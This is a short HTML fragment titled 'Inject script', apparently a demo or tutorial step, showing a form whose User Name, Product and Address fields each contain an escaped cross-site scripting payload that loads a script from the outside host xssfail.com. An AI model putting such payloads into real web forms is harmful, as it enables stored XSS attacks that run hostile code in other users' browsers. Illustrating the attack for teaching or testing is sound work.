<h1>Inject script</h1>
<div class="num">1</div>
<ul>
    <li>
        <label>User Name:</label>
        <input readonly="readonly" value="&lt;script src=&quot;http://xssfail.com/j.js&quot;&gt;&lt;/script&gt;" />
    </li>
    <li class="other">...</li>
	<li>
        <label>Product:</label>
        <input readonly="readonly" value="&lt;script src=&quot;http://xssfail.com/j.js&quot;&gt;&lt;/script&gt;" />
    </li>
	<li class="other">...</li>
	<li>
        <label>Address:</label>
        <input readonly="readonly" value="&lt;script src=&quot;http://xssfail.com/j.js&quot;&gt;&lt;/script&gt;" />
    </li>
    <li class="save">
        <button>
            <img alt="" src="{{img}}/apply.png" />
            <span>Save</span>
        </button>
    </li>
</ul>
